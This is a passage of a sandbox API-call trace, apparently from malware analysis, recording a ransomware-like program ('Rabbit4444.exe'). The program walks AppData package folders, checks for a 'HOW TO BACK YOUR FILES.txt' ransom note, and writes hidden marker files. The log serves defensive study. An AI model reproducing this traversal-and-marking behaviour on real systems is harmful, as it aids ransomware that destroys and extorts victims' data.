nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a50 [0066.432] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.432] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.432] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.432] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.432] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x740ca625, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x740ca625, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf0ea389d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.432] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.432] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.432] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.432] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.432] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.432] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0ea389d, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0ea389d, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0ea389d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.432] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.432] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.432] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0ea389d, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0ea389d, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0ea389d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0066.432] FindClose (in: hFindFile=0x102a50 | out: hFindFile=0x102a50) returned 1 [0066.432] lstrcpyW (in: lpString1=0x130ec10, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.432] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\LocalState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.oobenetworkconnectionflow_cw5n1h2txyewy\\localstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.433] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.433] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.433] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.434] CloseHandle (hObject=0x27c) returned 1 [0066.434] CloseHandle (hObject=0x228) returned 1 [0066.434] GetCurrentThreadId () returned 0xd98 [0066.434] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122048 [0066.434] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\LocalCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\LocalCache" [0066.434] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11bc08 | out: hHeap=0xe0000) returned 1 [0066.434] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122040 | out: hHeap=0xe0000) returned 1 [0066.434] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\LocalCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\LocalCache" [0066.434] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\LocalCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\LocalCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\LocalCache\\" [0066.434] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\LocalCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3" [0066.434] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.oobenetworkconnectionflow_cw5n1h2txyewy\\localcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.438] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.440] FlushFileBuffers (hFile=0x228) returned 1 [0066.441] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.441] CloseHandle (hObject=0x228) returned 1 [0066.442] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\LocalCache") returned 107 [0066.442] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.442] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\LocalCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x740ca625, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x740ca625, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf0ec9a77, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102810 [0066.442] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.442] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.442] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.442] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.442] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x740ca625, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x740ca625, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf0ec9a77, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.442] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.442] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.442] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.442] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.442] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.442] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0ec9a77, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0ec9a77, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0ec9a77, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.442] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.442] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.442] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0ec9a77, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0ec9a77, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0ec9a77, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0066.442] FindClose (in: hFindFile=0x102810 | out: hFindFile=0x102810) returned 1 [0066.442] lstrcpyW (in: lpString1=0x130ec10, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.442] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\LocalCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.oobenetworkconnectionflow_cw5n1h2txyewy\\localcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.443] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.443] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.443] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.444] CloseHandle (hObject=0x27c) returned 1 [0066.444] CloseHandle (hObject=0x228) returned 1 [0066.444] GetCurrentThreadId () returned 0xd98 [0066.444] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122308 [0066.444] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AppData" [0066.444] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11c068 | out: hHeap=0xe0000) returned 1 [0066.444] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122300 | out: hHeap=0xe0000) returned 1 [0066.444] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AppData" [0066.444] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AppData\\" [0066.444] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3" [0066.444] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.oobenetworkconnectionflow_cw5n1h2txyewy\\appdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.445] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.448] FlushFileBuffers (hFile=0x228) returned 1 [0066.449] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.449] CloseHandle (hObject=0x228) returned 1 [0066.449] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AppData") returned 104 [0066.449] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.449] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x740ca625, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x740ca625, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf0ec9a77, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0066.450] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.450] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.450] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.450] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.450] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x740ca625, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x740ca625, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf0ec9a77, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.450] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.450] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.450] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.450] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.450] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.450] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0ec9a77, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0ec9a77, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0eefcb9, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.450] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.450] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.450] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0ec9a77, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0ec9a77, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0eefcb9, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0066.450] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0066.450] lstrcpyW (in: lpString1=0x130ec0a, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.450] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.oobenetworkconnectionflow_cw5n1h2txyewy\\appdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.451] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.451] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.451] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.451] CloseHandle (hObject=0x27c) returned 1 [0066.451] CloseHandle (hObject=0x228) returned 1 [0066.451] GetCurrentThreadId () returned 0xd98 [0066.451] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122328 [0066.451] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC" [0066.451] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1166c0 | out: hHeap=0xe0000) returned 1 [0066.451] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122320 | out: hHeap=0xe0000) returned 1 [0066.451] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC" [0066.451] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\" [0066.451] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3" [0066.451] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.oobenetworkconnectionflow_cw5n1h2txyewy\\ac\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.454] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.458] FlushFileBuffers (hFile=0x228) returned 1 [0066.458] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.459] CloseHandle (hObject=0x228) returned 1 [0066.459] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC") returned 99 [0066.459] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.459] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x74116aed, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74116aed, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf0eefcb9, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0066.459] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.459] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.459] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.459] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.459] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x74116aed, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74116aed, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf0eefcb9, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.460] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.460] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.460] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.460] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.460] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.460] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0eefcb9, ftCreationTime.dwHighDateTime=0x1d54052, 